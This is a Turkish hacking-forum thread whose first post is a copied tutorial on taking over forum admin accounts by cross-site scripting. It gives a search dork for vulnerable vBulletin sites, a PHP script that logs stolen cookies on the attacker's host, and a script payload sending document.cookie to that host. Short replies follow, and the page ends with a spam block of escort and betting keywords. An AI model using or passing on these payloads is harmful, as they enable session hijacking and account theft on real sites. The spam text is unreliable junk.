instagram takipçi satın al pubg mobile uc Instagram takipçi satın al
6 sonuçtan 1 ile 6 arası

Konu: vBulletin Showthread.php Acigi ..! Türkiyede Nadir..!

  1. #1
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    dυѕLєяfσяυм üує

    Standart vBulletin Showthread.php Acigi ..! Türkiyede Nadir..!

    bunu [Linkleri Görebilmek için ÜYE Olmalısınız!Hemen ÜYE OL!] yaz

    intext:"HTML code is On" inurlhowthread.php


    Yukarıda çıkan sitelerde html kodu açık burada dilediğniz kodları çalıştırabilirsiniz.Size tavsiyem XSS cookie çalma yöntemiyle admin olmanız gerçekten çok basit yani sadece showthread.php de açık ne işimize yarar demeyin açtığınız konuya koyarsınız kodu admin gelr ...............!

    Kısacası yukarıdaki sitelere





    Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.

    Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.

    COOKIE’Yi Nasıl Çalarız..
    Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.

    En basitinden <script>javascript:alert(document.cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.


    Örnek:

    Basit yazılmış bir script ile cookie’nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.



    Kod:
    <?php
    $filename = getcwd()."\\loglarburaya.txt";


    if(!file_exists($filename)){
    touch($filename);
    chmod($filename, 0666);
    }

    if (isset($_GET["cookie"]))
    {
    if (!$handle = fopen($filename, ’a’))
    {
    echo "Hata: Loglar dosyaya kaydedilemedi!";
    exit;
    }
    else
    {
    if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
    {
    echo "Hata: Loglar dosyaya kaydedilemedi!";
    exit;
    }
    }
    echo "Log başarıyla girildi...";
    fclose($handle);
    exit;
    }
    echo "Hani loglayacağımız parametre?";
    exit;
    ?>

    Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie’yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.

    Açıklamalar:

    loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie’nin yazılabilmesi için mutlaka CHMOD’unun 777 yani yazma izinli olması gerekiyor.

    Cookie’yi çalma kodu:



    Kod:
    <script>window.navigate("http://siteniz.com/cookie.php?cookie="+document.cookie)</script>

    Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
    Örneğin elimizde [Linkleri Görebilmek için ÜYE Olmalısınız!Hemen ÜYE OL!]

    Biz bunu önceki verdiğim örnek kodla deniyoruz;
    www.xxx.com/oyun.asp?id=<script>javascript:alert(documen t.cookie);</script>

    Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.

    Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.



    Kod:
    http://www.xxx.com/oyun.asp?id=<scri...okie)</script>

    Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış..

    Alınıtıdır......

  2. #2
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    dυѕLєяfσяυм üує

    Standart

    iii bir y&#246;ntem

  3. #3
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    dυѕLєяfσяυм üує

    Standart

    Bencede Iyi Yonteme Benzior
    Y AM I FIGHTIN 2 LIVE IF I AM LIVIN 2 DIE!!!

  4. #4
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    |+|+ KuRuCu +|+|

    Standart

    suan hıcbır vbulletınnın html kodları acık degıl ...
    Giden Gitmiştir, Gittiği Gün Bitmiştir..
    Biz Gideni Değil, Giden Bizi Kaybetmiştir



  5. #5
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    dυѕLєяfσяυм üує

    Standart

    Paylasım İ&#231;in Teşşekk&#252;rler
    <========== FoRéVéR HayKo

    29 Şubat 2008 - Hayko Cepkin @ Ankara Koneri

    28 Şubat 2008 - Hayko Cepkin @ Eskişehir

    22 Şubat 2008 - Hayko Cepkin @ İzmit

  6. #6
    UYARI:
    Kullanıcıların Profil Bilgileri Misafirlere Kapatılmıştır. Görmek için KAYIT olmalısınız.~
    fσяυм ρяєηѕєѕ

    Standart ---> vBulletin Showthread.php Acigi ..! Türkiyede Nadir..!

    konu çok eski ama artık vbulletinin böyle açıkları bulunmuyor. Daha çok açıklar artık wordpress jooomla nın eklentilerinde oluyor.
    Konu -Ediz1912- tarafından (01 Mart 2021 Saat 16:36 ) değiştirilmiştir.

    Www.DuslerForum.ORG

    Not: Kontrol Panelinizden Bu Alanı Değiştirebilirsiniz.
    ( Facebook / Skype / Msn / RekLam / Video / Link / yasaktır)
    ..bu maddelerden birini veya bir kaçını eklerseniz üyeliğiniz durdurulacaktır..


Sistem Bilgileri

Bu sistem vBulletin® alt yapısına sahiptir!
Telif hakları, Jelsoft Enterprises Ltd'e aittir. Copyright © 2021

Uyarı

5651 Sayılı Kanun'un 4.cü maddesine göre üyeler yaptıkları paylaşımlardan sorumludur. Yer sağlayıcı olarak hizmet veren sitemiz hakkında yapılacak tüm hukuksal Şikayetler e-ticaret ile ilgili iletişime geçilmesi halinde size dönüş yapacaktır.

istanbul escort escort bayan ankara escort betboo tipobet retrobet Bahis siteleri justin tv Tjk canlı tipobet365 tipobet betmatik justin tv goldenbahis giriş escort konya celtabet tv celtabet kamu haber 2019 filmleri sincan escort onwin/ komedi filmleri/ ngsbahis betebete piabet bonus veren siteler bedava bonus veren siteler deneme bonusu deneme bonusu veren siteler 2021 restbet ngsbahis celtabet venusbet giriş ngsbahis liderbahis gaziantep rus escort betist giriş betist mariobet giriş mariobet mariobet mariobet giriş kızılay escort onwin betmatik supertotobet nerobet nerobet giriş nerobet sohbet odaları mariobet giriş venüsbet giriş twitter takipçi satın al grandpashabet liderbahis giriş tulipbet giriş sekabet liderbahis liderbahis tv gaziantep escort ucuz takipçi satın al twitter favori hilesi lord casino lordcasino giriş lordcasino lordcasino giriş romabet giriş almanbahis giriş istanbul escort bahis tv bahis tv jftphoto.com sahabet